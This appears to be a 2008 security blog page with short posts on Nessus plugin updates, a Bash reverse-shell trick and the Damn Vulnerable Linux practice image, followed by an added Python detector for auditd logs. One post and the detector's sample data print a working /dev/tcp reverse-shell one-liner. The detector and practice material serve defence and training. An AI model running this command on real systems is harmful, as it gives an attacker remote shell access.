May 16, 2008
We all know and love Nessus. Well today, Tenable made it even better. Nessus now fully supports su and sudo for audit and patch compliance checks. This is very cool.
Next, in response to the SSH key brouhaha this week, there are now a couple of plugins that will check for weak keys in SSH and SSL protected webservers.
Caveat: It appears that you need to be a Direct Feed/Professional subscriber to use these features.
Kevin
Security testing, vulnerability scanning | Tagged: vulnerability scanning |
Posted by Kevin Riggins
April 17, 2008

Neohapsis just created a lot of pain for those who are trying to stop folks who are able to execute arbitrary code on a host but unable to get a reverse shell. It used to be that you could remove netcat, wget, ftp, etc… and make it much more difficult for a reverse shell to be started. Enter the ever friendly and helpful Bash shell.
All you need is:
$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
and tadaa, reverse shell.
Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
Kevin Riggins
Security testing, Web App Testing, red team | Tagged: pen testing, reverse shell, Web App Testing |
Posted by Kevin Riggins
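Since removing netcat and friends no longer closes this door, the one-liner above has to be caught in process-execution logs instead. The following is an added example, not code from the original post or from Neohapsis: it assumes Linux auditd EXECVE records, and the sample records, address and port are constructed.

```python
import re

# Bash opens a socket when a redirection targets /dev/tcp/HOST/PORT (or /dev/udp/...).
NET_REDIRECT = re.compile(r"[<>]&?\s*/dev/(tcp|udp)/([^/\s]+)/(\w+)")
# auditd writes each argument as aN="text", or as bare hex when it contains
# spaces or quotes, so a plain grep for /dev/tcp misses "bash -c '<one-liner>'".
ARG = re.compile(r'\ba\d+=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def decode_args(record):
    """Return argv from one EXECVE record, decoding hex-encoded arguments."""
    argv = []
    for quoted, hexed in ARG.findall(record):
        if hexed:
            try:
                argv.append(bytes.fromhex(hexed).decode("utf-8", "replace"))
            except ValueError:  # odd-length value: keep it as logged
                argv.append(hexed)
        else:
            argv.append(quoted)
    return argv


def find_net_redirects(records):
    """Return (protocol, host, port, program) for each network redirection found."""
    hits = []
    for record in records:
        if "type=EXECVE" not in record:
            continue
        argv = decode_args(record)
        for m in NET_REDIRECT.finditer(" ".join(argv)):
            hits.append((m.group(1), m.group(2), m.group(3), argv[0]))
    return hits


# Constructed sample records (not real logs); 192.0.2.10 is a documentation address.
ONE_LINER = "exec /bin/sh 0</dev/tcp/192.0.2.10/4444 1>&0 2>&0"
SAMPLE = [
    'type=EXECVE msg=audit(1208450000.101:41): argc=2 a0="ls" a1="-l"',
    'type=EXECVE msg=audit(1208450007.412:42): argc=3 a0="bash" a1="-c" a2='
    + ONE_LINER.encode().hex().upper(),
    'type=EXECVE msg=audit(1208450009.020:43): argc=2 a0="ls" a1="/dev/tcp"',
]

if __name__ == "__main__":
    for hit in find_net_redirects(SAMPLE):
        print("network redirection:", hit)
```

A redirection typed into an already running shell is performed by bash itself and never shows up as an execve argument, so this only covers command strings passed as arguments, such as `bash -c`.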
March 28, 2008
You may all be aware of this, but I was not. Last night I was looking for a LiveCD to use for testing some web app testing tools against. A couple of fine folks, Craig and Wesley, suggested I check out Damn Vulnerable Linux. So I did.
After a couple hours of download time, the thing is 1.5 GBs, I fired up a virtual machine, booted the ISO, started Apache and began poking about. They have put together a fine set of vulnerable applications and web pages that are very useful for both learning about pen/web security testing and testing new tools you might come across. The testing part is good for keeping the intarweb police jackboots off your neck.
Check it out.
-Kevin
Security testing |
Posted by Kevin Riggins